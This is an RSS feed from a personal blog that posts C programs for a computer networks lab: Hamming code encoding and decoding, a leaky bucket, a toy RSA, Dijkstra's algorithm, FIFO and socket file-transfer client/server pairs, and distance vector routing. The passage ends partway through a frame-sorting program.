<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-3740830892798425044</atom:id><lastBuildDate>Fri, 01 Nov 2024 10:44:06 +0000</lastBuildDate><category>Hacking</category><category>Xp-Tricks</category><category>Networks-programs</category><category>Web Info</category><category>virus</category><category>Amazing Links</category><category>Ebooks</category><category>Hardware</category><category>Games</category><title>Reverse Engineering</title><description></description><link>http://zts-zts.blogspot.com/</link><managingEditor>noreply@blogger.com (Sharath)</managingEditor><generator>Blogger</generator><openSearch:totalResults>96</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><language>en-us</language><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-1203320186636361542</guid><pubDate>Sat, 20 Mar 2010 17:30:00 +0000</pubDate><atom:updated>2010-03-21T00:00:41.016-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>HAMMING CODE decoding:</title><description>#include"stdio.h"&lt;br /&gt;
#include"stdlib.h"&lt;br /&gt;
#include"math.h"&lt;br /&gt;
&lt;br /&gt;
int hmatrix[3][7]={1,0,0,0,1,1,1,0,1,0,1,0,1,1,0,0,1,1,1,0,1};&lt;br /&gt;
int edata[7];&lt;br /&gt;
int syndrome[3];&lt;br /&gt;
int errdig;&lt;br /&gt;
&lt;br /&gt;
int main()&lt;br /&gt;
{&lt;br /&gt;
int i,j;&lt;br /&gt;
system("clear");&lt;br /&gt;
printf("enter the encoded bits\n");&lt;br /&gt;
for(i=0;i&lt;7;i++)&lt;br /&gt;
scanf("%d",&amp;edata[i]);&lt;br /&gt;
for(i=0;i&lt;3;i++)&lt;br /&gt;
for(j=0;j&lt;7;j++)&lt;br /&gt;
syndrome[i]=syndrome[i]+edata[j]*hmatrix[i][j];&lt;br /&gt;
for(i=0;i&lt;3;i++)&lt;br /&gt;
syndrome[i]=syndrome[i]%2;&lt;br /&gt;
errdig=4*syndrome[0]+2*syndrome[1]+1*syndrome[2];&lt;br /&gt;
if(0==errdig)&lt;br /&gt;
printf("error free data");&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
printf("error in bit number %d--%d\n",errdig,edata[errdig]);&lt;br /&gt;
errdig--;&lt;br /&gt;
if(1==edata[errdig])&lt;br /&gt;
edata[errdig]=0;&lt;br /&gt;
else&lt;br /&gt;
edata[errdig]=1;&lt;br /&gt;
}&lt;br /&gt;
for(i=3;i&lt;7;i++)&lt;br /&gt;
printf("%d",edata[i]);&lt;br /&gt;
puts(" ");&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/hamming-code-decoding.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-8058194284206514110</guid><pubDate>Sat, 20 Mar 2010 17:29:00 +0000</pubDate><atom:updated>2010-03-21T00:01:02.431-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>Hamming Code-Encoding</title><description>#include"stdio.h"&lt;br /&gt;
#include"math.h"&lt;br /&gt;
#include"stdlib.h"&lt;br /&gt;
&lt;br /&gt;
char d1[5],d2[5],d3[5],d4[5];&lt;br /&gt;
char p1[5],p2[5],p3[5],p4[5];&lt;br /&gt;
char data[5];&lt;br /&gt;
char gmatrix[4][8];&lt;br /&gt;
int encoded[8];&lt;br /&gt;
int con(char x);&lt;br /&gt;
&lt;br /&gt;
int main()&lt;br /&gt;
{&lt;br /&gt;
int i,j;&lt;br /&gt;
system("clear");&lt;br /&gt;
printf("enter 4 data bits\n");&lt;br /&gt;
scanf("%s",data);&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
{&lt;br /&gt;
d1[i]=d2[i]=d3[i]=d4[i]='0';&lt;br /&gt;
p1[i]=p2[i]=p3[i]='1';&lt;br /&gt;
}&lt;br /&gt;
printf("--------------------------------------------------------\n");&lt;br /&gt;
d1[0]='1';&lt;br /&gt;
d2[1]='1';&lt;br /&gt;
d3[2]='1';&lt;br /&gt;
d4[3]='1';&lt;br /&gt;
p1[0]='0';&lt;br /&gt;
p2[1]='0';&lt;br /&gt;
p3[2]='0';&lt;br /&gt;
printf("%s\n",d1);&lt;br /&gt;
printf("%s\n",d2);&lt;br /&gt;
printf("%s\n",d3);&lt;br /&gt;
printf("%s\n",d4);&lt;br /&gt;
printf("%s\n",p1);&lt;br /&gt;
printf("%s\n",p2);&lt;br /&gt;
printf("%s\n",p3);&lt;br /&gt;
&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
gmatrix[i][0]=p1[i];&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
gmatrix[i][1]=p2[i];&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
gmatrix[i][2]=p3[i];&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
gmatrix[i][3]=d1[i];&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
gmatrix[i][4]=d2[i];&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
gmatrix[i][5]=d3[i];&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
gmatrix[i][6]=d4[i];&lt;br /&gt;
printf("\n generator matrix\n");&lt;br /&gt;
for(i=0;i&lt;4;i++)&lt;br /&gt;
printf("%s\n",gmatrix[i]);&lt;br /&gt;
/**ENCODING**/&lt;br /&gt;
&lt;br /&gt;
for(i=0;i&lt;7;i++)&lt;br /&gt;
for(j=0;j&lt;4;j++)&lt;br /&gt;
encoded[i]=encoded[i]+con(data[j])*con(gmatrix[j][i]);&lt;br /&gt;
puts("encoded");&lt;br /&gt;
&lt;br /&gt;
for(i=0;i&lt;7;i++)&lt;br /&gt;
{&lt;br /&gt;
encoded[i]=encoded[i]%2;&lt;br /&gt;
printf("%i",encoded[i]);&lt;br /&gt;
}&lt;br /&gt;
puts(" ");&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
int con(char x)&lt;br /&gt;
{&lt;br /&gt;
if(x=='1')&lt;br /&gt;
return 1;&lt;br /&gt;
else &lt;br /&gt;
return 0;&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/hamming-code-encoding.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-8037550155731050828</guid><pubDate>Sat, 20 Mar 2010 17:26:00 +0000</pubDate><atom:updated>2010-03-20T10:26:59.641-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>Leaky Bucket</title><description>                                                                     #include"stdio.h"&lt;br /&gt;
#include"stdlib.h"&lt;br /&gt;
#include"math.h"&lt;br /&gt;
&lt;br /&gt;
int t_rand(int a)&lt;br /&gt;
{&lt;br /&gt;
 int m;&lt;br /&gt;
 m=rand()%10;&lt;br /&gt;
 m=m%a;&lt;br /&gt;
 if(m==0)&lt;br /&gt;
 m=1;&lt;br /&gt;
 return m;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
void main()&lt;br /&gt;
{&lt;br /&gt;
int o_rate,bufsize,i,maxtime,presentsize=0,rate;&lt;br /&gt;
clrscr();&lt;br /&gt;
printf("enter the buffer size,output rate and max time for transaction");&lt;br /&gt;
scanf("%d%d",&amp;bufsize,&amp;o_rate);&lt;br /&gt;
rate=o_rate;&lt;br /&gt;
maxtime=t_rand(4)*10;&lt;br /&gt;
for(i=0;i&lt;maxtime;i++)
{
int incoming=0;
incoming=rand()%bufsize+3;
printf("the time is %d\n",i+1);
if(incoming!=0)
{
printf("the present size in the buffer is %d\n",presentsize);
printf("the incoming number of byte are %d\n",incoming);
if(incoming&lt;=(bufsize-presentsize))
{
printf("packet is accepted\n");
presentsize+=incoming;
}
else
printf("incoming packet is rejected");
printf("the present size in the buffer is %d\n",presentsize);
}
sleep(5);
o_rate=rate;
if(o_rate&gt;presentsize)&lt;br /&gt;
o_rate=presentsize;&lt;br /&gt;
presentsize-=o_rate;&lt;br /&gt;
printf("the present size of bucket is %d after removing %d bytes\n\n",presentsize,o_rate);&lt;br /&gt;
}&lt;br /&gt;
getch();&lt;br /&gt;
}&lt;br /&gt;
</description><link>http://zts-zts.blogspot.com/2010/03/leaky-bucket.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-1872658816869297718</guid><pubDate>Sat, 20 Mar 2010 17:23:00 +0000</pubDate><atom:updated>2010-03-20T10:25:31.953-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>RSA</title><description>#include"stdio.h"&lt;br /&gt;
#include"math.h"&lt;br /&gt;
#include"conio.h"&lt;br /&gt;
&lt;br /&gt;
double min(double x,double y)&lt;br /&gt;
{&lt;br /&gt;
return(x&lt;y ? x:y);
}

double max(double x,double y)
{
 return(x&gt;y ? x:y);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
double gcd(double x,double y)&lt;br /&gt;
{&lt;br /&gt;
if(x==y)&lt;br /&gt;
return x;&lt;br /&gt;
else&lt;br /&gt;
return(gcd(min(x,y),max(x,y)-min(x,y)));&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
/*long double dbin(long double n)&lt;br /&gt;
{&lt;br /&gt;
long double i=0,s=0,v,b;&lt;br /&gt;
do&lt;br /&gt;
{&lt;br /&gt;
s+=pow(10,i)*(fmod((int)n,2));&lt;br /&gt;
i++;&lt;br /&gt;
n=n/2;&lt;br /&gt;
}while(n&gt;=1);&lt;br /&gt;
return(s);&lt;br /&gt;
} */&lt;br /&gt;
&lt;br /&gt;
long double modexp(long double a,long double x,long double n)&lt;br /&gt;
{&lt;br /&gt;
long double r=1;&lt;br /&gt;
while(x&gt;0)&lt;br /&gt;
{&lt;br /&gt;
if((int)(fmodl(x,2))==1)&lt;br /&gt;
r=fmodl((r*a),n);&lt;br /&gt;
a=fmodl((a*a),n);&lt;br /&gt;
x/=2;&lt;br /&gt;
}&lt;br /&gt;
return(r);&lt;br /&gt;
&lt;br /&gt;
/* r=fmodl(pow(a,x),n);&lt;br /&gt;
return r;*/&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void main()&lt;br /&gt;
{&lt;br /&gt;
long double p,q,phi,n,e,d;&lt;br /&gt;
long double ms,es,ds,a[100];&lt;br /&gt;
int ch,i;&lt;br /&gt;
char s[100],c,m;&lt;br /&gt;
clrscr();&lt;br /&gt;
do&lt;br /&gt;
{&lt;br /&gt;
printf("\nEnter prime numbers\n");&lt;br /&gt;
scanf("%Lf%Lf",&amp;p,&amp;q);&lt;br /&gt;
printf("%Lf %Lf",p,q);&lt;br /&gt;
}while(p==q);&lt;br /&gt;
n=p*q;&lt;br /&gt;
phi=(p-1)*(q-1);&lt;br /&gt;
do&lt;br /&gt;
{&lt;br /&gt;
printf("\nEnter prime value of e\n");&lt;br /&gt;
scanf("%Lf",&amp;e);&lt;br /&gt;
printf("%Lf",e);&lt;br /&gt;
}while((gcd(e,phi)!=1) &amp;&amp; e&gt;phi);&lt;br /&gt;
for(d=1;d&lt;phi;++d)&lt;br /&gt;
if(fmod((e*d),phi)==1)&lt;br /&gt;
break;&lt;br /&gt;
printf("\nD within main=%Lf",d);&lt;br /&gt;
do&lt;br /&gt;
{&lt;br /&gt;
printf("\nEnter your choice\n1:Numbers\n2:Characters\n");&lt;br /&gt;
scanf("%d",&amp;ch);&lt;br /&gt;
switch(ch)&lt;br /&gt;
{&lt;br /&gt;
case 1:printf("\n\nEnter the message[numbers]:\n");&lt;br /&gt;
scanf("%Lf",&amp;ms);&lt;br /&gt;
printf("%Lf",ms);&lt;br /&gt;
es=modexp(ms,e,n);&lt;br /&gt;
ds=modexp(es,d,n);&lt;br /&gt;
printf("\n\nOriginal message:%Lf\n",ms);&lt;br /&gt;
printf("\nEncrypted message:%Lf\n",es);&lt;br /&gt;
printf("\nDecrypted message:%Lf\n",ds);&lt;br /&gt;
break;&lt;br /&gt;
&lt;br /&gt;
case 2:printf("Enter message[characters]\n");&lt;br /&gt;
fflush(stdin);&lt;br /&gt;
gets(s);&lt;br /&gt;
i=0;&lt;br /&gt;
while((c=s[i])!='\0')&lt;br /&gt;
{&lt;br /&gt;
c=c-'a';&lt;br /&gt;
c++;&lt;br /&gt;
a[i]=c;&lt;br /&gt;
es=modexp(a[i],e,n);&lt;br /&gt;
ds=modexp(es,d,n);&lt;br /&gt;
printf("\nOriginal message=%c",c+'a'-1);//((int)a[i]+'a'-1));&lt;br /&gt;
printf("\nEncrypted message=%Lf",es);&lt;br /&gt;
printf("\nDecrypted message=%c",((int)ds+'a'-1));&lt;br /&gt;
i++;&lt;br /&gt;
}&lt;br /&gt;
break;&lt;br /&gt;
default:break;&lt;br /&gt;
}&lt;br /&gt;
}while(ch&lt;=2);&lt;br /&gt;
getch();&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/rsa.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-1403365384896696116</guid><pubDate>Sat, 20 Mar 2010 17:22:00 +0000</pubDate><atom:updated>2010-03-20T10:25:04.466-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>Dijikrstra's Algo</title><description>#include"stdio.h"&lt;br /&gt;
#define INFINITY 999&lt;br /&gt;
&lt;br /&gt;
void dijkstra(int wrt[10][10],int n,int source,int distance[10])&lt;br /&gt;
{&lt;br /&gt;
int visited[10],min,u,i,j;&lt;br /&gt;
for(i=1;i&lt;=n;i++)&lt;br /&gt;
{&lt;br /&gt;
distance[i]=wrt[source][i];&lt;br /&gt;
visited[i]=0;&lt;br /&gt;
}&lt;br /&gt;
visited[source]=1;&lt;br /&gt;
for(i=1;i&lt;=n;i++)&lt;br /&gt;
{&lt;br /&gt;
min=INFINITY;&lt;br /&gt;
u=-1;&lt;br /&gt;
for(j=1;j&lt;=n;j++)&lt;br /&gt;
if(visited[j]==0 &amp;&amp; distance[j]&lt;min)&lt;br /&gt;
{&lt;br /&gt;
min=distance[j];&lt;br /&gt;
u=j;&lt;br /&gt;
}&lt;br /&gt;
visited[u]=1;&lt;br /&gt;
for(j=1;j&lt;=n;j++)&lt;br /&gt;
if(visited[j]==0 &amp;&amp; distance[u]+wrt[u][j]&lt;distance[j])&lt;br /&gt;
{&lt;br /&gt;
distance[j]=distance[u]+wrt[u][j];&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int  main()&lt;br /&gt;
{&lt;br /&gt;
int wrt[10][10],n,source,distance[10];&lt;br /&gt;
int i,j,sum;&lt;br /&gt;
printf("enter the nodes\n");&lt;br /&gt;
scanf("%d",&amp;n);&lt;br /&gt;
printf("write matrix\n");&lt;br /&gt;
for(i=1;i&lt;=n;i++)&lt;br /&gt;
for(j=1;j&lt;=n;j++)&lt;br /&gt;
scanf("%d",&amp;wrt[i][j]);&lt;br /&gt;
printf("enter the source\n");&lt;br /&gt;
scanf("%d\n",&amp;source);&lt;br /&gt;
dijkstra(wrt,n,source,distance);&lt;br /&gt;
for(i=1;i&lt;=n;i++)&lt;br /&gt;
if(distance[i]!=999)&lt;br /&gt;
printf("the shortest distance from %d to %d is %d\n",source,i,distance[i]);&lt;br /&gt;
else&lt;br /&gt;
printf("not reachable\n");&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/dijikrstras-algo.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-2558244074490038597</guid><pubDate>Sat, 20 Mar 2010 17:21:00 +0000</pubDate><atom:updated>2010-03-20T10:24:42.956-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>FIFO CLIENT</title><description>#include"sys/types.h"&lt;br /&gt;
#include"sys/stat.h"&lt;br /&gt;
#include"stdio.h"&lt;br /&gt;
#include"stdlib.h"&lt;br /&gt;
#include"fcntl.h"&lt;br /&gt;
&lt;br /&gt;
#define FIFO1 "fifo1"&lt;br /&gt;
#define FIFO2 "fifo2"&lt;br /&gt;
&lt;br /&gt;
void main()&lt;br /&gt;
{&lt;br /&gt;
FILE *fp;&lt;br /&gt;
char buff[2500],fn[100],c;&lt;br /&gt;
int rd,wd,i=0;&lt;br /&gt;
mknod(FIFO1,S_IFIFO|0666,0);&lt;br /&gt;
mknod(FIFO2,S_IFIFO|0666,0);&lt;br /&gt;
wd=open(FIFO1,O_WRONLY);&lt;br /&gt;
printf("enter filename");&lt;br /&gt;
scanf("%s",fn);&lt;br /&gt;
write(wd,fn,sizeof(fn));&lt;br /&gt;
rd=open(FIFO2,O_RDONLY);&lt;br /&gt;
read(rd,&amp;i,sizeof(i));&lt;br /&gt;
//next two lines added&lt;br /&gt;
if(i==0)&lt;br /&gt;
printf("file doesnt exist\n");&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
read(rd,buff,i);&lt;br /&gt;
write(1,buff,i);&lt;br /&gt;
}&lt;br /&gt;
unlink(FIFO1);&lt;br /&gt;
unlink(FIFO2);&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/fifo-client.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-8237882469599628131</guid><pubDate>Sat, 20 Mar 2010 17:21:00 +0000</pubDate><atom:updated>2010-03-20T10:24:02.379-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>FIFO SERVER</title><description>FIFO&lt;br /&gt;
server:&lt;br /&gt;
&lt;br /&gt;
#include"sys/types.h"&lt;br /&gt;
#include"sys/stat.h"&lt;br /&gt;
#include"stdio.h"&lt;br /&gt;
#include"stdlib.h"&lt;br /&gt;
#include"fcntl.h"&lt;br /&gt;
&lt;br /&gt;
#define FIFO1 "fifo1"&lt;br /&gt;
#define FIFO2 "fifo2"&lt;br /&gt;
&lt;br /&gt;
void main()&lt;br /&gt;
{&lt;br /&gt;
FILE *fp;&lt;br /&gt;
char buff[2500],fn[100],c;&lt;br /&gt;
int rd,wd,i=0;&lt;br /&gt;
mknod(FIFO1,S_IFIFO|0666,0);&lt;br /&gt;
mknod(FIFO2,S_IFIFO|0666,0);&lt;br /&gt;
rd=open(FIFO1,O_RDONLY);&lt;br /&gt;
read(rd,&amp;fn,sizeof(fn));&lt;br /&gt;
wd=open(FIFO2,O_WRONLY);&lt;br /&gt;
fp=fopen(fn,"r");&lt;br /&gt;
if(fp==NULL)&lt;br /&gt;
{&lt;br /&gt;
printf("file cant be created\n");&lt;br /&gt;
//next two lines r newly added&lt;br /&gt;
i=0;&lt;br /&gt;
write(wd,&amp;i,sizeof(i));&lt;br /&gt;
exit(0);&lt;br /&gt;
}&lt;br /&gt;
while((c=fgetc(fp))!=EOF)&lt;br /&gt;
{&lt;br /&gt;
buff[i]=c;&lt;br /&gt;
i++;&lt;br /&gt;
}&lt;br /&gt;
write(wd,&amp;i,sizeof(i));&lt;br /&gt;
write(wd,buff,i);&lt;br /&gt;
unlink(FIFO1);&lt;br /&gt;
unlink(FIFO2);&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/fifo-server.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-7108882138506572429</guid><pubDate>Mon, 01 Mar 2010 12:54:00 +0000</pubDate><atom:updated>2010-03-01T04:54:05.585-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>Socket server program</title><description>#include "netinet/in.h"&lt;br /&gt;
#include "unistd.h"&lt;br /&gt;
#include "stdio.h"&lt;br /&gt;
#include "sys/types.h"&lt;br /&gt;
#include "sys/socket.h"&lt;br /&gt;
#include "stdlib.h"&lt;br /&gt;
#include "arpa/inet.h"&lt;br /&gt;
#define IP "127.0.0.1"&lt;br /&gt;
#define PORT 6010&lt;br /&gt;
&lt;br /&gt;
int main()&lt;br /&gt;
{&lt;br /&gt;
int sd,ad,bd,i=0,j,ss;&lt;br /&gt;
char fn[256],buf[5000],c;&lt;br /&gt;
FILE *fp;&lt;br /&gt;
struct sockaddr_in server,client;&lt;br /&gt;
if((sd=socket(AF_INET,SOCK_STREAM,0))&lt;0)&lt;br /&gt;
      printf("\nSocket Error");&lt;br /&gt;
      server.sin_addr.s_addr=inet_addr(IP);&lt;br /&gt;
      server.sin_port=htons(PORT);&lt;br /&gt;
      server.sin_family=AF_INET;&lt;br /&gt;
      if((bd=bind(sd,(struct sockaddr *)&amp;server,sizeof(server)))&lt;0)&lt;br /&gt;
              printf("\nBind Error");&lt;br /&gt;
       listen(sd,5);&lt;br /&gt;
       ss=sizeof(client);&lt;br /&gt;
       if((ad=accept(sd,(struct sockaddr *)&amp;client,&amp;ss))&lt;0)&lt;br /&gt;
               printf("\nAccept Error");&lt;br /&gt;
        read(ad,&amp;fn,sizeof(fn));&lt;br /&gt;
        fp=fopen(fn,"r");&lt;br /&gt;
        if(fp==NULL)&lt;br /&gt;
        {&lt;br /&gt;
                printf("\nFile doesnot exist");&lt;br /&gt;
                 write(ad,&amp;i,sizeof(i));&lt;br /&gt;
                  exit(0);&lt;br /&gt;
           }&lt;br /&gt;
           while((c=fgetc(fp))!=EOF)&lt;br /&gt;
           {&lt;br /&gt;
                   buf[i]=c;&lt;br /&gt;
                    i++;&lt;br /&gt;
             }&lt;br /&gt;
             write(ad,&amp;i,sizeof(i));&lt;br /&gt;
             for(j=0;j&lt;i;j++)&lt;br /&gt;
                     write(ad,&amp;buf[j],sizeof(buf[j]));&lt;br /&gt;
              fclose(fp);&lt;br /&gt;
              close(sd);&lt;br /&gt;
              close(bd);&lt;br /&gt;
              close(ad);&lt;br /&gt;
              return 0;&lt;br /&gt;
              }</description><link>http://zts-zts.blogspot.com/2010/03/socket-server-program.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-8550336026362287498</guid><pubDate>Mon, 01 Mar 2010 12:52:00 +0000</pubDate><atom:updated>2010-03-01T04:52:28.383-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>Socket client program</title><description>#include "netinet/in.h"&lt;br /&gt;
#include "unistd.h"&lt;br /&gt;
#include "stdio.h"&lt;br /&gt;
#include "sys/types.h"&lt;br /&gt;
#include "sys/socket.h"&lt;br /&gt;
#include "stdlib.h"&lt;br /&gt;
#include "arpa/inet.h"&lt;br /&gt;
#define IP "127.0.0.1"&lt;br /&gt;
#define PORT 6010&lt;br /&gt;
&lt;br /&gt;
int main()&lt;br /&gt;
{&lt;br /&gt;
int sd,cd,i=0,n;&lt;br /&gt;
char fn[256],buf[5000];&lt;br /&gt;
struct sockaddr_in server;&lt;br /&gt;
if((sd=socket(AF_INET,SOCK_STREAM,0))&lt;0)&lt;br /&gt;
        printf("\nSocket Error");&lt;br /&gt;
 server.sin_addr.s_addr=inet_addr(IP);&lt;br /&gt;
 server.sin_port=htons(PORT);&lt;br /&gt;
 server.sin_family=AF_INET;&lt;br /&gt;
 if((cd=connect(sd,(struct sockaddr *)&amp;server,sizeof(server)))&lt;0)&lt;br /&gt;
         printf("\nConnect Error");&lt;br /&gt;
  printf("\nEnter filename= ");&lt;br /&gt;
          scanf("%s",fn);&lt;br /&gt;
   write(sd,&amp;fn,sizeof(fn));&lt;br /&gt;
   read(sd,&amp;n,sizeof(n));&lt;br /&gt;
  // next two lines r newly added with else&lt;br /&gt;
   if(n==0)&lt;br /&gt;
   printf("file doesnt exist\n");&lt;br /&gt;
   else{&lt;br /&gt;
   printf("%d",n);&lt;br /&gt;
   for(i=0;i&lt;n;i++)&lt;br /&gt;
   {&lt;br /&gt;
           read(sd,&amp;buf[i],sizeof(char));&lt;br /&gt;
    }&lt;br /&gt;
    for(i=0;i&lt;n;i++)&lt;br /&gt;
    {&lt;br /&gt;
            write(1,&amp;buf[i],sizeof(char));&lt;br /&gt;
  //   printf("%c",buf[i]);&lt;br /&gt;
     }&lt;br /&gt;
     }&lt;br /&gt;
     close(sd);&lt;br /&gt;
     close(cd);&lt;br /&gt;
     return 0;&lt;br /&gt;
     }</description><link>http://zts-zts.blogspot.com/2010/03/socket-client-program.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-7693517313795131913</guid><pubDate>Mon, 01 Mar 2010 12:49:00 +0000</pubDate><atom:updated>2010-03-01T04:50:50.984-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>Distance Vector</title><description>#include"stdio.h"&lt;br /&gt;
#include"stdlib.h"&lt;br /&gt;
#define nul 1000&lt;br /&gt;
#define nodes 10&lt;br /&gt;
int no;&lt;br /&gt;
&lt;br /&gt;
struct node&lt;br /&gt;
{&lt;br /&gt;
int a[nodes][4];&lt;br /&gt;
}router[nodes];&lt;br /&gt;
&lt;br /&gt;
void init(int r)&lt;br /&gt;
{&lt;br /&gt;
int i;&lt;br /&gt;
for(i=1;i&lt;=no;i++)
       {
        router[r].a[i][1]=i;
 router[r].a[i][2]=999;
  router[r].a[i][3]=nul;
  }
    router[r].a[r][2]=0;

router[r].a[r][3]=r;
}

void inp(int r)
{
 int i;
printf("Enter distance from the node %d to other nodes\n",r);
printf("Enter 999 if there is no direct route\n");
for(i=1;i&lt;=no;i++)
{
if(i!=r)
{
printf("Enter distance to node %d\n",i);
scanf("%d",&amp;router[r].a[i][2]);
router[r].a[i][3]=i;
}
}
}

void display(int r)
{
int i;
printf("The routing table for node %d is as follows :\n",r);
for(i=1;i&lt;=no;i++)
{
if(router[r].a[i][2]&gt;=999)&lt;br /&gt;
printf("\t\t %d \t no link \t no hop\n",router[r].a[i][1]);&lt;br /&gt;
else&lt;br /&gt;
printf("\t\t %d \t %d \t\t %d\n",router[r].a[i][1],router[r].a[i][2],router[r].a[i][3]);&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void dv_algo(int r)&lt;br /&gt;
{&lt;br /&gt;
int i,j,z;&lt;br /&gt;
for(i=1;i&lt;=no;i++)
{
if(router[r].a[i][2]!=999 &amp;&amp; router[r].a[i][2]!=0)
{
for(j=1;j&lt;=no;j++)
{
z=router[r].a[i][2]+router[i].a[j][2]; 
if(router[r].a[j][2]&gt;z)&lt;br /&gt;
{&lt;br /&gt;
router[r].a[j][2]=z;&lt;br /&gt;
router[r].a[j][3]=i;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int main()&lt;br /&gt;
{&lt;br /&gt;
int i,j,x,y;&lt;br /&gt;
char choice;&lt;br /&gt;
printf("Enter the number of nodes required\n");&lt;br /&gt;
scanf("%d",&amp;no);&lt;br /&gt;
for(i=1;i&lt;=no;i++)&lt;br /&gt;
{&lt;br /&gt;
init(i);&lt;br /&gt;
inp(i);&lt;br /&gt;
}&lt;br /&gt;
printf("The configuration of the nodes after initialization is as follows :\n");&lt;br /&gt;
for(i=1;i&lt;=no;i++)&lt;br /&gt;
display(i);&lt;br /&gt;
for(i=1;i&lt;=no;i++)&lt;br /&gt;
dv_algo(i);&lt;br /&gt;
printf("The configuration of the nodes after computation of path is as follows:\n");&lt;br /&gt;
for(i=1;i&lt;=no;i++)&lt;br /&gt;
display(i);&lt;br /&gt;
while(1)&lt;br /&gt;
{&lt;br /&gt;
printf("Continue(y/n)\n");&lt;br /&gt;
scanf("%s",&amp;choice);&lt;br /&gt;
if(choice=='n')&lt;br /&gt;
break;&lt;br /&gt;
printf("Enter the nodes between which shortest path is to be found\n");&lt;br /&gt;
scanf("%d%d",&amp;x,&amp;y);&lt;br /&gt;
printf("The length of the shortest path is %d\n",router[x].a[y][2]);&lt;br /&gt;
}&lt;br /&gt;
return 0;&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/distance-vector_01.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-7446420405143809667</guid><pubDate>Mon, 01 Mar 2010 12:44:00 +0000</pubDate><atom:updated>2010-03-01T04:47:43.462-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>Frame Sorting</title><description>#include "stdio.h"&lt;br /&gt;
struct frame&lt;br /&gt;
{&lt;br /&gt;
int fslno;&lt;br /&gt;
char finfo[20];&lt;br /&gt;
};&lt;br /&gt;
struct frame arr[10];&lt;br /&gt;
int n;&lt;br /&gt;
void sort()&lt;br /&gt;
{&lt;br /&gt;
int i,j,ex;&lt;br /&gt;
struct frame temp;&lt;br /&gt;
for(i=0;i&lt;=n;i++)
  {
  ex=0;
  for(j=0;j&lt;n-i-1;j++)
